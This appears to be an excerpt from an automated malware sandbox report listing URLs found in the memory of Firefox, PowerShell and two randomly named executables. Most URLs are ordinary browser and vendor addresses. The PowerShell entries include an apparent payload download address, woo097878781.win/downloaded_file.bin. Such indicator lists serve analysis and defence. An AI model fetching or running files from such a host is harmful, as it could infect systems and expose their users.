Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2868138373.0000019CF917D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711012212.0000019CFB02C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711421911.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2879851015.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2864089087.0000019CED4D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://gre/modules/translation/LanguageDetecto
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFAB61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2869247332.0000019CF95DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: powershell.exe, 0000000E.00000002.2606762712.0000028D1B44E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2582645797.0000028D0CD10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2606762712.0000028D1B30C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0CA2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0CA2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711012212.0000019CFB02C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711421911.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2879851015.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2868138373.0000019CF917D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711012212.0000019CFB02C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711421911.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2879851015.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF963C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2910613755.0000019CFF029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2881255814.0000019CFB200000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2930962305.0000019D06F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2881255814.0000019CFB200000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF96A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2930962305.0000019D06F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFAB61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFABE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707461103.0000019CFD13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA240000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707211364.0000019CFD120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707697289.0000019CFD15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2708005438.0000019CFD17B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/Can
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2910613755.0000019CFF029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF96A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2910613755.0000019CFF029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2http://mozil
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD917000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD917000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000022.00000002.2869247332.0000019CF9503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2906486113.0000019CFEA43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000022.00000002.2866895836.0000019CF8C9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2895818368.0000019CFDB7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF96B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2803693593.0000019D0588D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2927658878.0000019D05885000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2930962305.0000019D06F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/http://mozilla.org/#/properties/branches/anyOf/1/items/properties/featur
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE6D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2895818368.0000019CFDB7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD917000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs:resource://nimbus/lib/RemoteSettingsExperimentLoader.sys.mjs
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2803693593.0000019D0588D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2927658878.0000019D05885000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2930962305.0000019D06F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_CONFIG_CHANGE
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_CONFIG_CHANGEdiscoverystream.endpointsDISCOVERY_STR
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE50C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2910613755.0000019CFF0F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD955000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: c92938c010.exe, 00000010.00000003.2554109353.0000000005DA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFAB61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFABE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2881255814.0000019CFB200000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/resource:///modules/UrlbarProviderOpen
Source: firefox.exe, 00000022.00000003.2852709897.0000019CFFC40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFAB49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2881255814.0000019CFB200000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: c92938c010.exe, 00000010.00000003.2605720937.0000000006026000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2908502313.0000019CFED33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helphttps://support.mozi
Source: firefox.exe, 00000022.00000002.2917540153.0000019CFFD7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsUnable
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translationtranslations-panel-error-load-languages-hint-butto
Source: c92938c010.exe, 00000010.00000003.2605720937.0000000006026000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: c92938c010.exe, 00000010.00000003.2554109353.0000000005DA2000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2554391272.0000000005D55000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2554240490.0000000005D55000.00000004.00000800.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2936414035.00000000001DC000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000003.2797196729.0000000005880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 2bd330404c.exe, 00000011.00000002.2936414035.00000000001DC000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: c92938c010.exe, 00000010.00000003.2554391272.0000000005D30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: c92938c010.exe, 00000010.00000003.2554109353.0000000005DA2000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2554391272.0000000005D55000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2554240490.0000000005D55000.00000004.00000800.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2936414035.00000000001DC000.00000040.00000001.01000000.0000000E.sdmp, 2bd330404c.exe, 00000011.00000003.2797196729.0000000005880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: c92938c010.exe, 00000010.00000003.2554391272.0000000005D30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: 2bd330404c.exe, 00000011.00000002.2936414035.00000000001DC000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFAB61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000022.00000003.2838031242.0000019D05A6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2933623282.000014908F32E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2932386721.00000595B9F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0C8D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0B4D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2582645797.0000028D0C8D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/downloaded_file.bin
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2815333733.0000019CFE569000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDEDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2815333733.0000019CFE569000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDEDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000022.00000003.2838031242.0000019D05A6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2933623282.000014908F32E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2932386721.00000595B9F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDEDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: c92938c010.exe, 00000010.00000003.2606708211.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707461103.0000019CFD13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707211364.0000019CFD120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD917000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707697289.0000019CFD15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2708005438.0000019CFD17B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000022.00000002.2922045046.0000019D00AA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozill
Source: c92938c010.exe, 00000010.00000003.2553366123.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2553274997.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: c92938c010.exe, 00000010.00000003.2606708211.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000022.00000002.2918649954.0000019CFFE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2933623282.000014908F32E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2929818299.0000019D05A18000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2923486121.0000019D0125B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2908502313.0000019CFED33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000022.00000003.2838640090.0000019D05A27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2811066167.0000019D059E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000022.00000003.2706915349.0000019CFCF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707461103.0000019CFD13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707211364.0000019CFD120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707697289.0000019CFD15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2708005438.0000019CFD17B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: c92938c010.exe, 00000010.00000003.2553366123.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2553274997.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000022.00000002.2871367507.0000019CFA2A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF963C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2706915349.0000019CFCF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707461103.0000019CFD13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707211364.0000019CFD120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD917000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707697289.0000019CFD15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2708005438.0000019CFD17B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA240000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2815333733.0000019CFE569000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDEDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000022.00000002.2871367507.0000019CFA2A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2846128138.0000019CFFEAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA240000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2918550215.0000019CFFE5E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2934164368.00001D559FD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2859243750.0000000DD86BC000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: c92938c010.exe, 00000010.00000003.2605720937.0000000006026000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2908502313.0000019CFED33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2828092027.0000019CFE281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
